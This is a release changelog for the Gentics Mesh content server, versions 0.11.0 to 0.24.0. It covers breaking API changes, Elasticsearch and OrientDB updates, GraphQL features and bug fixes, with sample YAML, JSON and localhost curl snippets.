== 0.24.0 (25.07.2018)

CAUTION: The default value of `25` for the `perPage` parameter has been removed. By default all elements will be returned and no paging will be applied.

icon:check[] Core: A regression within the webroot performance enhancement fix of `0.23.0` has been fixed.

[[v0.23.0]]
== 0.23.0 (24.07.2018)

CAUTION: The breadcrumb of the REST node response and the breadcrumb of the node type in GraphQL have changed.
The first element is now the root node of the project followed by its descendants including the currently queried node. Previously the order was reversed. Additionally the root node and the current node were missing. link:https://github.com/gentics/mesh/issues/398[#398]

CAUTION: The concept of releases has been renamed to branches. The database structure will automatically be updated.

* The following query parameters have been changed: `release` -> `branch`, `updateAssignedReleases` -> `updateAssignedBranches`, `updateReleaseNames` -> `updateBranchNames`
* The `releases` endpoint was renamed to `branches`.
* The `mesh.release.created`, `mesh.release.updated`, `mesh.release.deleted` events have been changed to `mesh.branch.created`, `mesh.branch.updated`, `mesh.branch.deleted`.
* The Java REST models have been renamed. (e.g. ReleaseCreateRequest -> BranchCreateRequest)
* I18n messages have been changed accordingly.
* The GraphQL field `release` has been renamed to `branch`. The type name was also updated.

icon:plus[] Elasticsearch: The base64 encoded binary document data will no longer be stored in the search index.

icon:plus[] Elasticsearch: The `/search/status` endpoint now has a new field `available`, which shows if Elasticsearch is currently ready to process search queries.

icon:plus[] Elasticsearch: An error was fixed which was thrown when Elasticsearch was disabled and a re-sync was scheduled.

icon:plus[] REST: Added the `?etag=false` query parameter which can be used to omit the etag value generation in order to increase performance when etags are not needed.

icon:plus[] REST: Added the `?fields=uuid,username` query parameter which can be used to filter the response to only include the listed fields. The filters work for most responses and can be used to increase write performance for REST.

icon:plus[] GraphQL: It is now possible to filter schemas by their container flag.

icon:check[] GraphQL: Fixed a bug that caused an error when multiple queries were executed concurrently.

icon:check[] Core: Increased the performance of the webroot endpoint.

icon:plus[] REST: Re-enabled SSL options. It is now possible to configure SSL via the `MESH_HTTP_SSL_KEY_PATH`, `MESH_HTTP_SSL_CERT_PATH` and `MESH_HTTP_SSL_ENABLE` environment variables.

[[v0.22.11]]
== 0.22.11 (05.03.2019)

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 10.0.

icon:plus[] GraphQL: Nodes can now be loaded via a list of UUIDs.

[[v0.22.10]]
== 0.22.10 (18.01.2019)

icon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never finish. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.

icon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing.

[[v0.22.9]]
== 0.22.9 (15.01.2019)

icon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.

icon:plus[] Memory: The memory footprint of various operations has been reduced.

icon:plus[] Consistency Checks: The consistency endpoint response will now also contain a `repairCount` property which lists the count of repair operations (see the sketch below). The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.

icon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.
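A hedged sketch of invoking the consistency endpoint mentioned above (hostname and token are placeholders; the base path stands in for `{apiLatest}`):

[source,bash]
----
# Fetch the consistency report; the response now includes the
# repairCount and outputTruncated properties described above.
curl "http://localhost:8080/api/v1/admin/consistency/check" \
     -H "Authorization: Bearer $MESH_TOKEN"
----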
[[v0.22.8]]
== 0.22.8 (30.11.2018)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37

[[v0.22.7]]
== 0.22.7 (12.11.2018)

icon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.

icon:plus[] API: Made OAuth2 server options overridable via environment variables.

[[v0.22.6]]
== 0.22.6 (30.10.2018)

icon:check[] Java REST Client: Fixed wrong log output information.

icon:check[] REST: Fixed an error while fetching jobs for deleted projects.

icon:plus[] Elasticsearch: The index sync will now automatically remove indices which are no longer used.

[[v0.22.5]]
== 0.22.5 (12.10.2018)

icon:plus[] A default paging value can now be configured via the `defaultPageSize` field in the `mesh.yml` file, or the `MESH_DEFAULT_PAGE_SIZE` environment variable.

icon:check[] Java REST Client: Added more detailed error information to the `MeshRestClientMessageException` class.

[[v0.22.4]]
== 0.22.4 (08.10.2018)

icon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.

icon:check[] Elasticsearch: The initial sync check will be omitted if no Elasticsearch has been configured.

icon:plus[] Plugins: It is now possible to override the plugin config in a `config.local.yml` file.

[[v0.22.3]]
== 0.22.3 (20.09.2018)

icon:plus[] It is now possible to add custom languages by configuration.

[[v0.22.2]]
== 0.22.2 (13.09.2018)

icon:check[] Java REST Client: Fixed a bug that could lead to duplicate request headers.

[[v0.22.1]]
== 0.22.1 (14.08.2018)

icon:plus[] Migration: The micronode and release migration performance has been greatly enhanced.

[[v0.22.0]]
== 0.22.0 (19.07.2018)

icon:bullhorn[] Metadata extraction

[quote]
____
This version of Gentics Mesh introduces the __Metadata extraction__ of file uploads (PDF, images).
GPS information of images will now be added to the search index. That information can be used to run link:{{< relref "elasticsearch.asciidoc" >}}#_search_nodes_by_geolocation_of_images[geo search queries].
A detailed description of this feature can be found in our link:{{< relref "features.asciidoc" >}}#_metadata_handling[File Uploads Documentation].

Existing binary fields will not automatically be processed to provide the metadata. You need to manually re-upload the data in order to generate the metadata properties.
____

icon:check[] Image: Focal point information within binary fields will now be utilized when invoking a download request which contains `?crop=fp&height=200&width=100`. Previously the stored information was not used and no focal point cropping was executed. link:https://github.com/gentics/mesh/issues/417[#417]

icon:check[] Schema: A minor issue within the schema diff mechanism has been fixed. Previously the `elasticsearch` property was not correctly handled if an empty object was provided during an update.

[[v0.21.5]]
== 0.21.5 (14.07.2018)

icon:check[] REST: The order of elements within a micronode list field will now be correctly preserved. Previously the order would change once the list reached a size of about 20 elements.
link:https://github.com/gentics/mesh/issues/469[#469]

icon:check[] Memory: The memory footprint for deletion, publish and unpublish operations has been greatly reduced.

icon:check[] Config: Fixed the handling of the `MESH_VERTX_WORKER_POOL_SIZE` and `MESH_VERTX_EVENT_POOL_SIZE` environment variables. These variables were previously ignored.

icon:check[] REST: The node update response will now contain the updated node in the correct language. Any provided language parameter will be ignored.

icon:plus[] REST: The amount of fields which will be returned can now be tuned using the `?fields` query parameter. The parameter can be used to improve the write performance by only including the `uuid` field in the response.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.3

[[v0.21.4]]
== 0.21.4 (09.07.2018)

icon:plus[] Migration: Segment path conflicts will now automatically be resolved during the node migration. Information about the actions taken can be found within the job migration response.

icon:plus[] Migration: The node migration performance has been greatly enhanced. link:https://github.com/gentics/mesh/issues/453[#453]

icon:check[] Elasticsearch: Start-up of Gentics Mesh will now fail early if the embedded Elasticsearch server can't be started. link:https://github.com/gentics/mesh/issues/445[#445]

icon:check[] Elasticsearch: The error logging has been enhanced. More detailed information will be logged if an index can't be created.

icon:check[] UI: Fixed potential encoding issues in the UI on systems which are not using the UTF-8 default character set.

icon:check[] Core: Fixed a bug that caused an unwanted schema migration when a schema update without any changes was invoked. This was the case with the `elasticsearch` properties.

[[v0.21.3]]
== 0.21.3 (19.06.2018)

icon:check[] GraphQL: Fixed a bug that caused an error when multiple queries were executed concurrently.

icon:check[] GraphQL: The language fallback handling for node reference fields has been enhanced. The language of the node will now be utilized when no language fallback has been specified.

icon:check[] GraphQL: The language fallback handling has been enhanced. The language fallback will now automatically be passed along to load nested fields.

icon:check[] GraphQL: The link resolving of html and string fields has been updated. Previously the language of the node which contained the field was not taken into account while resolving mesh links in these fields.

[[v0.21.2]]
== 0.21.2 (13.06.2018)

icon:check[] Elasticsearch: A compatibility issue with Elasticsearch instances which were hosted on Amazon AWS has been fixed. Previously the check for installed ES plugins failed.

[[v0.21.1]]
== 0.21.1 (28.05.2018)

icon:plus[] Elasticsearch: It is now possible to configure https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html[custom mappings] for binary fields. Currently only the `mimeType` and `file.content` fields can be mapped.
An example for this mapping can be found in the link:{{< relref "elasticsearch.asciidoc" >}}#_binary_fields[Gentics Mesh search documentation].

[[v0.21.0]]
== 0.21.0 (27.05.2018)

icon:bullhorn[] Binary Search

[quote]
____
This version of Gentics Mesh introduces the __Binary Search support__.

The https://www.elastic.co/guide/en/elasticsearch/plugins/6.2/ingest-attachment.html[Elasticsearch Ingest Attachment Plugin] will be utilized if possible to process text file uploads (PDF, DOC, DOCX).
A detailed description of this feature can be found in our link:{{< relref "elasticsearch.asciidoc" >}}#_binarysearch[Elasticsearch Documentation].
____

icon:plus[] Elasticsearch: It is now possible to configure a prefix string within the search options. Multiple Gentics Mesh installations with different prefixes can now utilize the same Elasticsearch server. Created indices and pipelines will automatically be prefixed. Other elements which do not start with the prefix will be ignored.

[[v0.20.0]]
== 0.20.0 (25.05.2018)

icon:bullhorn[] OAuth2 Support

[quote]
____
This version of Gentics Mesh introduces the __OAuth2 authentication support__. A detailed description of this feature can be found in our link:{{< relref "authentication.asciidoc" >}}#_oauth2[Authentication Documentation].
____

icon:plus[] Plugins: All plugin endpoints will now automatically be secured via the configured authentication mechanism.

icon:check[] Plugins: The admin client token will no longer expire. The token was previously only valid for one hour.

icon:check[] Plugins: When the deployment of a plugin fails during plugin initialization, the plugin can now be redeployed without restarting Gentics Mesh.

icon:check[] Plugins: Fixed a bug which prevented the user client from using the correct token. The user client will now utilize the correct user token.

[[v0.19.2]]
== 0.19.2 (02.05.2018)

icon:check[] Docker: The base image of the Gentics Mesh docker container has been reverted back to `java:openjdk-8-jre-alpine`. We will switch to Java 10 with the upcoming OrientDB 3.0.0 update.

icon:check[] UI: In some cases the UI did not load fast. We updated the caching mechanism to quickly load the UI after a new Gentics Mesh version has been deployed.

[[v0.19.1]]
== 0.19.1 (30.04.2018)

icon:plus[] REST: The `{apiLatest}/admin/consistency/repair` endpoint has been added. The endpoint can be used to verify and directly repair found inconsistencies.
The `{apiLatest}/admin/consistency/check` endpoint response has been updated to also include information about the action which will be performed by `/repair` in order to repair the inconsistency.
You can read more about these endpoints in the link:{{< relref "administration-guide.asciidoc" >}}#_database_consistency[database consistency] section of our administration documentation.

[[v0.19.0]]
== 0.19.0 (28.04.2018)

icon:bullhorn[] Plugin System

[quote]
____
This version of Gentics Mesh introduces the _Plugin System_.
A detailed description of this feature can be found in our link:{{< relref "plugin-system.asciidoc" >}}[Plugin System Documentation].
____
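As a quick, non-normative sketch of interacting with the new system (the listing endpoint is an assumption based on the plugin system documentation; hostname and token are placeholders):

[source,bash]
----
# List the currently deployed plugins (assumed endpoint; see the plugin system docs).
curl "http://localhost:8080/api/v1/admin/plugins" \
     -H "Authorization: Bearer $MESH_TOKEN"
----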
icon:plus[] The base image of the Gentics Mesh docker container has been changed to `openjdk:10-slim`.

icon:plus[] Logging: The logging verbosity has been further decreased.

[[v0.18.3]]
== 0.18.3 (25.04.2018)

icon:check[] REST: Added an error response when updating a user node reference without specifying the project name.

icon:check[] REST: Fixed the root cause of an inconsistency which caused the deletion of referenced nodes when deleting a node.

[[v0.18.2]]
== 0.18.2 (23.04.2018)

CAUTION: The database revision was updated due to the OrientDB update. Thus only an link:{{< relref "clustering.asciidoc" >}}#_offline_upgrade[offline upgrade] can be performed when using clustered mode.

CAUTION: The generation of the search index document version has been reworked in order to increase index sync performance.
A triggered index sync will thus re-sync all documents. Triggering the sync action is not required and can be executed at any time.

icon:plus[] Backup/Restore: It is no longer required to restart the server after a backup has been restored via the `{apiLatest}/admin/graphdb/restore` endpoint. link:https://github.com/gentics/mesh/issues/387[#387]

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.34

icon:plus[] Consistency: Additional consistency checks have been added.

icon:check[] Consistency: Various consistency issues have been fixed.

icon:check[] REST: Fixed various security related issues.

icon:check[] Core: Image data in binary fields will now only be processed/transformed if the binary is in a readable file format. The readable image file formats are `png`, `jpg`, `bmp` and `gif`.

icon:check[] Core: Added consistency checks for node versions.

icon:check[] Core: Deleting language versions of nodes will no longer create inconsistencies.

icon:check[] Core: Projects containing multiple releases can now be deleted without any error.

[[v0.18.1]]
== 0.18.1 (13.04.2018)

icon:check[] Core: Added a consistency check for node containers.

icon:check[] GraphQL: Using filtering with nodes without content no longer throws an error.

icon:check[] REST: Added missing `hostname` and `ssl` property handling for release creation requests.

icon:check[] REST: Creating a release with a fixed UUID will now invoke the node migration.

icon:check[] Java REST Client: The `eventbus()` method now correctly sends authorization headers.

icon:check[] Java Rest Client: Missing methods to start schema/microschema migrations for a release have been added.

[[v0.18.0]]
== 0.18.0 (06.04.2018)

icon:bullhorn[] GraphQL filtering

[quote]
____
This version of Gentics Mesh introduces _GraphQL filtering_. A detailed description of this feature can be found in our link:{{< relref "graphql.asciidoc" >}}#_filtering[Documentation].
____

---

CAUTION: Search: The `{apiLatest}/search/reindex` endpoint was replaced by `{apiLatest}/search/sync`.

icon:plus[] Docs: The link:{{< relref "contributing.asciidoc" >}}[Contribution Guide] has been added.

icon:plus[] The `{apiLatest}/search/sync` endpoint can now be used to trigger the differential synchronization of search indices.
The indices will no longer be dropped and re-populated. Instead only the needed actions will be executed to sync the index with the Gentics Mesh data.
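A hedged curl sketch of triggering such a sync (the `POST` method is an assumption; hostname and token are placeholders):

[source,bash]
----
# Trigger a differential synchronization of the search indices.
curl -X POST "http://localhost:8080/api/v1/search/sync" \
     -H "Authorization: Bearer $MESH_TOKEN"
----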
icon:plus[] The `{apiLatest}/search/clear` endpoint has been added. It can be used to re-create all Elasticsearch indices which are managed by Gentics Mesh.
Note that this operation does not invoke the index sync.

icon:plus[] Docker: A new volume location for the data directory of the embedded Elasticsearch has been added.
You can now use the `/elasticsearch/data` folder to mount your Elasticsearch data files. link:https://github.com/gentics/mesh/issues/348[#348]

icon:plus[] REST: The `{apiLatest}/search/status` endpoint has been enhanced. The endpoint will now also return the current Elasticsearch sync progress.

icon:plus[] Logging: The logging verbosity has been further decreased.

icon:check[] REST: Fixed the ETag generation for nodes.
Previously taking a node offline did not alter the ETag, which also led to inconsistent status information being displayed in the Mesh UI. link:https://github.com/gentics/mesh/issues/345[#345]

icon:check[] Java Rest Client: Fixed webroot requests never returning when the path contained whitespace.

icon:check[] GraphQL: Fixed a bug where the language parameter of the nodes query method was ignored in some cases. link:https://github.com/gentics/mesh/issues/365[#365]

icon:check[] REST: The `{apiLatest}/microschemas` endpoint will now correctly detect name conflicts during microschema creation.

[[v0.17.3]]
== 0.17.3 (15.03.2018)

icon:check[] UI: Nodes are now restricted to certain schemas if `allow` is set in node list fields.

[[v0.17.2]]
== 0.17.2 (13.03.2018)

icon:plus[] Docker: A new volume location for the `config` directory has been added.
You can now use the `/config` folder to mount your configuration files.

icon:plus[] Core: The Vert.x library has been downgraded to 3.5.0 due to a regression which could cause requests to not be handled by the HTTP server.

[[v0.17.1]]
== 0.17.1 (08.03.2018)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.33

icon:plus[] Core: The core Vert.x library was updated to version 3.5.1

icon:plus[] Config: It is now possible to configure the Elasticsearch start-up timeout via the `search.startupTimeout` field in the `mesh.yml` or via the `MESH_ELASTICSEARCH_STARTUP_TIMEOUT` environment variable.

icon:plus[] Search: The reindex endpoint will now execute the reindex operation asynchronously.

icon:plus[] Search: Two new reindex specific events have been added: `mesh.search.reindex.failed`, `mesh.search.reindex.completed`.

icon:plus[] REST: The `GET {apiLatest}/search/status` endpoint response has been updated. The `reindexRunning` flag has been added.

icon:check[] Config: Fixed a bug which prevented optional boolean environment variables (e.g. `MESH_HTTP_CORS_ENABLE_ENV`) from being handled correctly.

icon:check[] Core: It is now possible to change the listType of a list field in a schema via the REST API.

icon:check[] Core: The server will now shut down if an error has been detected during start-up.

icon:check[] REST: Fixed an error which led to inconsistent properties being shown in the job endpoint response.

icon:check[] Search: When calling reindex via the `POST {apiLatest}/search/reindex` endpoint the reindexing stopped after a certain amount of time because of a timeout in the database transaction.
This has been fixed now.

icon:check[] REST: In some cases parallel file uploads of multiple images could cause the upload process to never finish. This has been fixed now.

[[v0.17.0]]
== 0.17.0 (22.02.2018)

CAUTION: Search: The raw search endpoints now wrap a multisearch request. The endpoint response will now include the Elasticsearch responses array. The query stays the same.

icon:plus[] Demo: The link:https://demo.getmesh.io/demo[demo application] was updated to use Angular 5.

icon:plus[] Core: Gentics Mesh can now be downgraded if the link:{{< relref "administration-guide.asciidoc" >}}#database-revisions[database revision] matches the needed revision of Gentics Mesh.

icon:plus[] Clustering: Gentics Mesh is now able to form a cluster between different server versions.
A database revision hash will now be used to determine which versions of Gentics Mesh can form a cluster.
Only instances with the same database revision hash are allowed to form a cluster.
The current revision hash info is included in the `{apiLatest}` endpoint response.

icon:plus[] Various settings can now be overridden via link:{{< relref "administration-guide.asciidoc" >}}#_environment_variables[environment variables]. This is useful when dealing with docker based deployments.

icon:check[] Elasticsearch: Search requests failed on systems with many schemas. link:https://github.com/gentics/mesh/issues/303[#303]

icon:check[] Elasticsearch: Fixed the handling of `search.url` settings which contained an https URL.

icon:check[] Image: The image resizer returned the original image if no `fpx`,`fpy` were present for a focal point image resize request. link:https://github.com/gentics/mesh/issues/272[#272]

icon:check[] Image: The focal point resize returned a slightly skewed image when using the `fpz` zoom factor. link:https://github.com/gentics/mesh/issues/272[#272]

icon:check[] Events: The `mesh.node.deleted` event was not handled correctly. This has been fixed now.

icon:check[] Core: It was possible to upload binaries with empty filenames. This has been fixed now: it is enforced that a binary upload has a filename and content type which are not empty. link:https://github.com/gentics/mesh/issues/299[#299]

icon:check[] Core: If the keystore path was only a file name without a directory an NPE was thrown on start-up. This has been fixed now.

icon:check[] Core: After resetting a job via REST (admin/jobs/::uuid::/error) the job was not processed again. This has been fixed now. link:https://github.com/gentics/mesh/issues/295[#295]

icon:check[] Core: When the migration for multiple nodes failed during a schema migration the error details could become very long. This has been fixed now. Error details in the job list will be truncated after a certain amount of characters.

icon:check[] Core: Image transformation calls previously did not copy the image properties of the binary field; the filename and other properties were missing on the new binary image field. This has been fixed now.

icon:plus[] REST: It is now possible to use custom `HttpClientOptions` upon instantiation of a `MeshRestHttpClient`.

icon:check[] REST: The node response ETag now incorporates the uuids of all node references.

icon:check[] REST: The `{apiLatest}/auth/logout` endpoint will now correctly delete the `mesh.token` cookie. link:https://github.com/gentics/mesh/issues/282[#282]
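A hedged sketch of such a logout call (hostname and token are placeholders):

[source,bash]
----
# Log out; the response should now clear the mesh.token cookie.
# The -i flag prints the response headers so the Set-Cookie header can be inspected.
curl -i "http://localhost:8080/api/v1/auth/logout" \
     -H "Authorization: Bearer $MESH_TOKEN"
----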
[[v0.16.0]]
== 0.16.0 (07.02.2018)

CAUTION: Search: The contents of HTML and HTML list fields will now automatically be stripped of markup prior to indexing.

CAUTION: The `mesh.yml` search section has been updated. The `search.url` property replaces the `search.hosts` property.

[source,yaml]
----
search:
  url: "http://localhost:9200"
  timeout: 8000
  startEmbedded: false
----

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 7.0.

icon:check[] REST: An error which prevented the `{apiLatest}` info endpoint from returning version information has been fixed.

icon:plus[] OrientDB: The included OrientDB Studio has been updated to version 2.2.32.

icon:plus[] Config: It is now possible to configure the JVM arguments of the embedded Elasticsearch server via the `search.embeddedArguments` property in the `mesh.yml` file.

icon:plus[] GraphQL: Schema fields can now be queried. Currently supported are `name`, `label`, `required` and `type`.

[[v0.15.0]]
== 0.15.0 (31.01.2018)

CAUTION: The embedded Elasticsearch was removed and replaced by a connector to a dedicated Elasticsearch server. It is highly recommended to verify existing queries due to breaking changes between Elasticsearch version 2.4 and 6.1.
Please also check the Elasticsearch changelog: link:https://www.elastic.co/guide/en/elasticsearch/reference/current/release-notes-6.1.0.html[Elasticsearch Changelog]

CAUTION: Configuration: The `mesh.yml` format has been updated. Please remove the `search` section or replace it with the following settings.

[source,yaml]
----
search:
  hosts:
    - hostname: "localhost"
      port: 9200
      protocol: "http"
  startEmbeddedES: true
----

CAUTION: The Elasticsearch update may affect custom mappings within your schemas. You may need to manually update your schemas.

Elasticsearch 6.1 compliant example for the commonly used raw field:

[source,json]
----
{
  "fields": {
    "raw": {
      "type": "keyword",
      "index": true
    }
  }
}
----

CAUTION: The `unfilteredCount` GraphQL paging property has been removed. You can now use the `totalCount` property instead.

CAUTION: Gentics Mesh will automatically extract and start an embedded Elasticsearch server in the `elasticsearch` folder. The old search index (e.g. `data/searchIndex`) can be removed.

CAUTION: The user which is used to run the process within the docker image has been changed. You may need to update your data volume ownership to uid/gid 1000.

icon:plus[] REST: The UUID of the referenced binary data will now also be listed for binary fields.
Fields which share the same binary data will also share the same binary UUID.

icon:plus[] GraphQL: It is now possible to read the focal point information and binary uuid of binary fields.

icon:plus[] Docs: The link:{{< relref "elasticsearch.asciidoc" >}}[Elasticsearch integration documentation] has been enhanced.

icon:plus[] Search: The overall search performance has been increased.

icon:plus[] Logging: The logging verbosity has been further decreased.

[[v0.14.2]]
== 0.14.2 (30.01.2018)

icon:check[] Elasticsearch: Fixed a bug which caused an internal error when granting multiple permissions to the same element at the same time.

icon:check[] GraphQL: The `linkType` parameter for string and html fields now causes the link to be rendered in the language of the queried node if no language information is given.

[[v0.14.1]]
== 0.14.1 (19.01.2018)

icon:check[] Core: Fixed a deadlock situation which could occur when handling more than 20 image resize requests in parallel. Image resize operations will now utilize a dedicated thread pool.

icon:check[] Core: Fixed a bug which caused permission inconsistencies when deleting a group from the system.

icon:plus[] REST: Added support to automatically handle the `Expect: 100-Continue` header. We however recommend to only use this header for upload requests.
Using this header will otherwise reduce the response times of your requests. Note that PHP curl will add this header by default.
You can read more about the link:https://support.urbanairship.com/hc/en-us/articles/213492003--Expect-100-Continue-Issues-and-Risks[header here].

[[v0.14.0]]
== 0.14.0 (16.01.2018)

CAUTION: The image manipulation query parameters `cropx`, `cropy`, `croph` and `cropw` have been replaced by the `rect` parameter. The `rect` parameter contains the needed values `rect=x,y,w,h`.

CAUTION: The image manipulation query parameter `width` was renamed to `w`. The parameter `height` was renamed to `h`.

CAUTION: The binary transformation request was updated. The crop parameters are now nested within the `cropRect` object.

CAUTION: It is now required to specify the crop mode when cropping an image. Possible crop modes are `rect`, which will utilize the specified crop area, or `fp`, which will utilize the focal point information in order to crop the image.

icon:plus[] Image: It is now possible to specify a focal point within the binary field of an image.
This focal point can be used to automatically crop the image in a way so that the focused area is kept in the image.
The focal point can also be manually specified when requesting an image.
This will overrule any previously stored focal point information within the binary field.

icon:plus[] UI: The admin UI has been updated to use the renamed image parameters.

[[v0.13.3]]
== 0.13.3 (12.01.2018)

icon:check[] Core: Optimized concurrency when handling binary data streams (e.g. downloading, image resizing).

icon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead to a lock-up of the system in some cases.

[[v0.13.2]]
== 0.13.2 (11.01.2018)

icon:plus[] Java Rest Client: It is now possible to retrieve the client version via `MeshRestClient.getPlainVersion()`.

icon:check[] Core: The consistency checks have been enhanced.

icon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system.
This could lead to a lock-up of the system in some cases.

[[v0.13.1]]
== 0.13.1 (05.01.2018)

icon:check[] Core: A Vert.x bug has been patched which caused HTTP requests to fail which had the "Connection: close" header set.

icon:check[] REST: A concurrency issue has been addressed which only happened when deleting and creating projects in fast succession.

icon:check[] Core: A potential concurrency issue has been fixed when handling request parameters.

[[v0.13.0]]
== 0.13.0 (02.01.2018)

CAUTION: The Java REST client was updated to use RxJava 2.

icon:plus[] Core: The internal RxJava code has been migrated to version 2.

[[v0.12.0]]
== 0.12.0 (21.12.2017)

CAUTION: The `search.httpEnabled` option within the `mesh.yml` has been removed. The embedded Elasticsearch API can no longer be directly accessed via HTTP. The existing endpoint `{apiLatest}/:projectName/search` is unaffected by this change.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.0

icon:plus[] Core: The internal server routing system has been overhauled.

== 0.11.8 (18.12.2017)

icon:check[] Image: Fixed a bug which left file handles open and thus clogged the system. This could lead to a lock-up of the system in some cases.

== 0.11.7 (17.12.2017)

icon:check[] UI: Fixed an issue where the name in the explorer content list was always shown in English. link:https://github.com/gentics/mesh/issues/23[#23]

icon:check[] Storage: Binary field deletion has been made more resilient and will no longer fail if the referenced binary data is not stored within the used binary storage. link:https://github.com/gentics/mesh/issues/235[#235]

icon:plus[] REST: The `hostname` and `ssl` properties have been added to the project create request. This information will be directly added to the initial release of the project. The properties can thus be changed by updating the project.

icon:plus[] REST: The link resolver mechanism was enhanced to also consider the `hostname` and `ssl` flag of the release of the node which is linked.
The link resolver will make use of these properties as soon as mesh links point to nodes of foreign projects.
You can read more on this topic in the link:{{< relref "features.asciidoc" >}}#crossdomainlinks[cross domain link section] of our documentation.

== 0.11.6 (15.12.2017)

icon:plus[] Search: The automatic recreation of the search index will now also occur if an empty search index folder was found.

icon:check[] UI: Nodes are now always reloaded when the edit button is clicked in the explorer content list. link:https://github.com/gentics/mesh-ui/issues/16[#16]

icon:check[] UI: Fixed an issue that was causing a click on a node in the explorer list to open it like a container, even if it is not a container.

icon:check[] UI: Dropdowns for required string fields with the allowed attribute now properly require a value to be set in order to save the node.

icon:check[] UI: Fixed an issue where the contents of a micronode were not validated before saving a node.

icon:check[] Core: Reduced the memory load of the ChangeNumberStringsToNumber changelog by reducing the size of single transactions.

icon:check[] Image: Image handling has been optimized. Previously resizing larger images could temporarily lock up the HTTP server.

== 0.11.5 (14.12.2017)

icon:plus[] UI: Added a multi binary upload dialogue.
Users can now upload multiple files at once by clicking the button next to the create node button.

icon:plus[] UI: Binary fields can now be used as display fields. The filename is used as the display name for the node. link:https://github.com/gentics/mesh-ui/issues/11[#11]

icon:plus[] UI: It is now possible to specify the URL to the front end of a system. This allows users to quickly go to the page that represents the node in the system.
See the default `mesh-ui-config.js` or the link:{{< relref "user-interface.asciidoc" >}}#_configuration[online documentation] for more details. link:https://github.com/gentics/mesh-ui/issues/14[#14]

icon:plus[] Upload: The upload handling code has been refactored in order to process the uploaded data in parallel.

icon:plus[] Storage: The binary storage mechanism has been overhauled in preparation for Amazon S3 / link:https://minio.io/[Minio] support.
The data within the local binary storage folder and all binary fields will automatically be migrated.
The created `binaryFilesMigrationBackup` folder must be manually removed once the migration has finished.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.31

icon:plus[] Core: Binary fields can now be chosen as display fields. The value of the display field is the filename of the binary.

icon:plus[] REST: The display name has been added to the node response. It can be found in the key `displayName`.

icon:plus[] GraphQL: The display name can now be fetched from a node via the `displayName` field.

icon:check[] UI: Nodes in the "Select Node..." dialogue are now sorted by their display name. link:https://github.com/gentics/mesh-ui/issues/15[#15]

icon:check[] UI: The "Select Node..." dialogue now remembers the last position at which it was opened. link:https://github.com/gentics/mesh-ui/issues/12[#12]

icon:check[] UI: The dropdown for list types in the schema editor now only shows valid list types.

icon:check[] UI: Fixed a bug that caused the image preview to disappear after saving a node. link:https://github.com/gentics/mesh-ui/issues/18[#18]

icon:check[] Core: A bug has been fixed which prevented node updates.
The issue occurred once a node was updated from which a language variant was previously deleted.

icon:check[] Search: The search index will now automatically be recreated if the search index folder could not be found.

icon:check[] Core: The values of number fields were stored as strings in the database, which caused issues when converting numbers to and from strings.
This has been fixed: the values of number fields will now be stored as numbers.

icon:check[] Schema: The schema deletion process will now also include all schema versions, referenced changes and jobs.

icon:check[] Clustering: An NPE which could occur during the initial setup of a clustered instance has been fixed.

== 0.11.4 (07.12.2017)

icon:check[] Core: Fixed various errors which could occur when loading a node for which the editor or creator user has been previously deleted.

== 0.11.3 (30.11.2017)

icon:plus[] Core: Various performance enhancements have been made to increase the concurrency handling and to lower the request times.

icon:plus[] Websocket: It is now possible to register to a larger set of internal events.
A full list of all events is documented within the link:{{< relref "features.asciidoc" >}}#_eventbus_bridge_websocket[eventbus bridge / websocket documentation].

icon:plus[] Config: The eventloop and worker pool size can now be configured within the `mesh.yml` file.

icon:plus[] Logging: The logging verbosity was reduced.

icon:plus[] GraphQL: It is now possible to load a list of all languages of a node via the added `.languages` field.

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 6.0

icon:check[] Core: Fixed a bug which prevented uploading multiple binaries to the same node.

icon:check[] UI: Fixed the error message handling for failed save requests.

icon:check[] UI: Fixed the dropdown positioning in IE within the node edit area.

icon:check[] Memory: The memory usage for micronode migrations has been improved.

== 0.11.2 (21.11.2017)

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.30

icon:check[] Core: Fixed a bug which caused unusually high CPU usage. link:https://github.com/gentics/mesh/issues/201[#201]

== 0.11.1 (13.11.2017)

icon:plus[] Elasticsearch: Added support for inline queries.

icon:check[] Elasticsearch: In some cases the connection to Elasticsearch was not directly ready during start-up. This caused various issues. A start-up check has been added in order to prevent this.

icon:check[] Schema: A bug within the schema update mechanism which removed the urlField property value has been fixed.

icon:check[] Elasticsearch: A deadlock situation which could occur during schema validation was fixed.

== 0.11.0 (11.11.2017)

CAUTION: GraphQL: The root field `releases` has been removed. The root field `release` now takes no parameters and loads the active release.

CAUTION: Elasticsearch: Search queries will now automatically be wrapped in a boolean query in order to check permissions much more efficiently.

CAUTION: The schema field property `searchIndex` / `searchIndex.addRaw` has been removed. The property was replaced by a mapping definition which can be added to each field.
All schemas will automatically be migrated to the new format.
Please keep in mind to also update any existing schema files which you may have stored externally.

[source,json]
----
{
  "name": "dummySchema",
  "displayField": "name",
  "fields": [
    {
      "name": "name",
      "label": "Name",
      "required": true,
      "type": "string",
      "elasticsearch": {
        "raw": {
          "index": "not_analyzed",
          "type": "string"
        }
      }
    }
  ]
}
----

icon:plus[] Schema: It is now possible to configure index settings and custom search index field mappings within the schema.

